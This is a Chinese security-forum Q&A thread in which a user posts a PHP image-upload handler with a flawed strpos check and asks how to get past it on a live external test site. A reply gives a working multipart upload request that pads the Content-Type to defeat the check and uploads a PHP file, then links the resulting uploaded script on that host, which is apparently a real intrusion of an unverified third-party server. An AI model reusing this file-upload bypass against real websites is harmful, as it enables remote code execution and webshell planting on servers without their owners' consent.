关于php上传漏洞问题请教-求助问答-看雪-安全社区|安全招聘|kanxue.com

未解决关于php上传漏洞问题请教

发表于: 2021-1-16 06:49 1880

未解决关于php上传漏洞问题请教

漠北蝈蝈

2021-1-16 06:49

1880

<?php
 
 
 if(empty($_FILES['file']))
   {
       echo json_encode(['isSuccess'=>false,'msg'=>'请上传二维码']);exit;
   }
 
   $file = $_FILES["file"];
 
   if ($file["error"] > 0)
   {
       echo json_encode(['isSuccess'=>false,'msg'=>'上传图片信息错误']);exit;
 
   }
 
   if(strpos($file["type"],'image') == false)
   {
       echo json_encode(['isSuccess'=>false,'msg'=>'请上传图片']);exit;
   }
 
   $temp = explode(".", $file["name"]);
   $extension = end($temp);
 
 
   $new_path = 'upload/'.time().rand(1000,9999).'.'.$extension;
 
   if(move_uploaded_file($file["tmp_name"], $new_path))
   {
       echo json_encode(['isSuccess'=>true,'msg'=>'上传成功','file'=>$new_path]);
   }
   else
   {
       echo json_encode(['isSuccess'=>false,'msg'=>'上传失败']);exit;
   }

if(strpos($file["type"],'image') == false)
这是判断image字符串在$file['type']中第一次出现的位置
我这个php版本是0 然后0==false是成立的
可就是传不上去，我朋友非说能传上去。
http://ag.1nj6xv.id/agent@991688/tx_upload.php 这是测试地址
burp改包测试不行，有老哥能突破吗

[招生]科锐逆向工程师培训(2024年11月15日实地，远程教学同时开班, 第51期)

收藏・0

免费・0

支持

最新回复 (5)
kxzpy 雪币： 3496 活跃值： (749) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 262 粉丝 2 关注私信	kxzpy 2 楼 https://blog.csdn.net/u012161726/article/details/78038706?utm_medium=distribute.pc_relevant.none-task-blog-baidujs_title-6&spm=1001.2101.3001.4242 这个吗？没有前端，没法测试 2021-1-16 09:05 0
零加一雪币： 2040 活跃值： (4950) 能力值： ( LV13，RANK：278 ) 在线值：发帖 12 回帖 41 粉丝 150 关注私信	零加一 3 3 楼 http://ag.1nj6xv.id/agent@991688/upload/16107618092737.php ---------------------------acebdf13572468 Content-Disposition: form-data; name="file"; filename="test.php" Content-Type: 这里随便填充一个及以上不为空的数据防止代码中strpos返回0image/jpeg <?php phpinfo();?> ---------------------------acebdf13572468-- 2021-1-16 09:55 0
漠北蝈蝈雪币： 73 活跃值： (281) 能力值： ( LV2，RANK：10 ) 在线值：发帖 16 回帖 42 粉丝 0 关注私信	漠北蝈蝈 4 楼多谢多谢 2021-1-16 14:34 0
漠北蝈蝈雪币： 73 活跃值： (281) 能力值： ( LV2，RANK：10 ) 在线值：发帖 16 回帖 42 粉丝 0 关注私信	漠北蝈蝈 5 楼零加一 http://ag.1nj6xv.id/agent@991688/upload/16107618092737.php ---------------------------acebdf13572 ... 多谢老哥，明白了 2021-1-16 14:35 0
漠北蝈蝈雪币： 73 活跃值： (281) 能力值： ( LV2，RANK：10 ) 在线值：发帖 16 回帖 42 粉丝 0 关注私信	漠北蝈蝈 6 楼 kxzpy https://blog.csdn.net/u012161726/article/details/78038706?utm_medium=distribute.pc_relevant.none-tas ... 多谢老哥 2021-1-16 14:35 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

漠北蝈蝈

发帖

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (5)
kxzpy 雪币： 3496 活跃值： (749) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 262 粉丝 2 关注私信	kxzpy 2 楼 https://blog.csdn.net/u012161726/article/details/78038706?utm_medium=distribute.pc_relevant.none-task-blog-baidujs_title-6&spm=1001.2101.3001.4242 这个吗？没有前端，没法测试 2021-1-16 09:05 0
零加一雪币： 2040 活跃值： (4950) 能力值： ( LV13，RANK：278 ) 在线值：发帖 12 回帖 41 粉丝 150 关注私信	零加一 3 3 楼 http://ag.1nj6xv.id/agent@991688/upload/16107618092737.php ---------------------------acebdf13572468 Content-Disposition: form-data; name="file"; filename="test.php" Content-Type: 这里随便填充一个及以上不为空的数据防止代码中strpos返回0image/jpeg <?php phpinfo();?> ---------------------------acebdf13572468-- 2021-1-16 09:55 0
漠北蝈蝈雪币： 73 活跃值： (281) 能力值： ( LV2，RANK：10 ) 在线值：发帖 16 回帖 42 粉丝 0 关注私信	漠北蝈蝈 4 楼多谢多谢 2021-1-16 14:34 0
漠北蝈蝈雪币： 73 活跃值： (281) 能力值： ( LV2，RANK：10 ) 在线值：发帖 16 回帖 42 粉丝 0 关注私信	漠北蝈蝈 5 楼零加一 http://ag.1nj6xv.id/agent@991688/upload/16107618092737.php ---------------------------acebdf13572 ... 多谢老哥，明白了 2021-1-16 14:35 0
漠北蝈蝈雪币： 73 活跃值： (281) 能力值： ( LV2，RANK：10 ) 在线值：发帖 16 回帖 42 粉丝 0 关注私信	漠北蝈蝈 6 楼 kxzpy https://blog.csdn.net/u012161726/article/details/78038706?utm_medium=distribute.pc_relevant.none-tas ... 多谢老哥 2021-1-16 14:35 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

未解决 关于php上传漏洞问题请教

未解决关于php上传漏洞问题请教